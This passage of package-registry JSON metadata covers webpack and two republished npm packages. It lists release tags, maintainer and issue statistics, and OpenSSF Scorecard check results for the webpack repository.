s/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T21:24:10.440Z","dependent_packages_count":1,"downloads":14,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":37.249016373683894,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.08499011129127237,"forks_count":0.5289098337806207,"average":15.88296857261247},"purl":"pkg:npm/fis-msprd-webpack_1_14_0","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/fis-msprd-webpack_1_14_0","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/fis-msprd-webpack_1_14_0","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/fis-msprd-webpack_1_14_0/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T19:17:33.706Z","issues_count":10170,"pull_requests_count":9468,"avg_time_to_close_issue":10847458.413030302,"avg_time_to_close_pull_request":2764488.9421997755,"issues_closed_count":9900,"pull_requests_closed_count":8910,"pull_request_authors_count":1445,"issue_authors_count":6691,"avg_comments_per_issue":5.832251720747296,"avg_comments_per_pull_request":3.1891634980988592,"merged_pull_requests_count":6045,"bot_issues_count":8,"bot_pull_requests_count":2916,"past_year_issues_count":85,"past_year_pull_requests_count":955,"past_year_avg_time_to_close_issue":839618.0847457628,"past_year_avg_time_to_close_pull_request":356132.6119205298,"past_year_issues_closed_count":59,"past_year_pull_requests_closed_count":755,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":67,"past_year_avg_comments_per_issue":3.2823529411764705,"past_year_avg_comments_per_pull_request":4.964397905759163,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":141,"past_year_merged_pull_requests_count":601,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":178,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":130,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":38,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":452,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"TheLarkInn","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_14_0/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_14_0/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_14_0/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_14_0/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_14_0/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_14_0/codemeta","maintainers":[{"uuid":"everthis","login":"everthis","name":null,"email":"wwwaap@gmail.com","url":null,"packages_count":68,"html_url":"https://www.npmjs.com/~everthis","role":null,"created_at":"2022-11-12T09:22:14.058Z","updated_at":"2022-11-12T09:22:14.058Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/everthis/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2568980,"name":"webpack2","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2018-05-14T02:38:49.792Z","latest_release_published_at":"2018-05-14T03:46:53.936Z","latest_release_number":"3.11.1","last_synced_at":"2026-09-03T00:22:22.350Z","created_at":"2022-04-10T03:39:30.962Z","updated_at":"2026-09-03T00:22:22.350Z","registry_url":"https://www.npmjs.com/package/webpack2","install_command":"npm install webpack2","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.11.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: 